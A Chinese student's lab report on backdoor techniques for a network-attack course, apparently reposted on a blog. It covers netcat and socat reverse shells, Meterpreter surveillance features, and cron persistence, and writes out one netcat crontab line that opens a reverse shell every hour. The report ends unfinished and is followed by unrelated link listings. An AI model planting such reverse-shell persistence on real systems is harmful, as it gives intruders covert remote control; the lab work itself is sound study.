首页 技术 正文
技术 2022年11月7日
0 收藏 960 点赞 390 浏览 1114 个字

2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践

1.实验准备

一、实验说明

任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

二、问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?
  • 在下载东西时候没有从官方网站,有捆绑软件或后门
  • 问:例举你知道的后门如何启动起来(win及linux)的方式?
  • win:修改注册表、引诱我们点击从而执行

    lunix:绑定注入shellcode开启后门

  • 问:Meterpreter有哪些给你映像深刻的功能?
  • 远程控制摄像头、键击等用户关键信息

实验过程记录

任务一:Windows获得Linux Shell

  1. 在Windows下使用ipconfig查看本机IP:

  2. 使用ncat.exe程序监听本机的5319端口

  3. 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5319端口

  4. 成功获得Kali的shell,如下图所示:

任务二:Linux获得Windows Shell

1. 在Kali环境中使用ifconfig查看IP
2. 使用nc指令监听`5319`端口
3. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的`5319`端口
4. Kali下可以看到Windows的命令提示,可以输入Windows命令:

任务三:使用nc传输数据

1. Windows下监听5319端口:
2. Kali下连接到Windows的5319端口:
3. 传输数据:

3. Meterpreter

任务一:使用netcat获取主机操作Shell,cron启动

  1. 在Windows系统下,监听5319端口

  2. crontab -e指令编辑一条定时任务,选择第三个选项:

  3. 在最后一行添加48 * * * * /bin/netcat 192.168.3.103 5319 -e /bin/sh,意思是在每个小时的第48分钟反向连接Windows主机的5319端口:(注意是虚拟机的时间):

  4. 当时间到了,此时已经获得了Kali的shell,可以输入指令:

任务二:使用socat获取主机操作Shell, 任务计划启动

相关知识:

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:8,955
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,479
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,291
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,108
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:7,740
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:4,774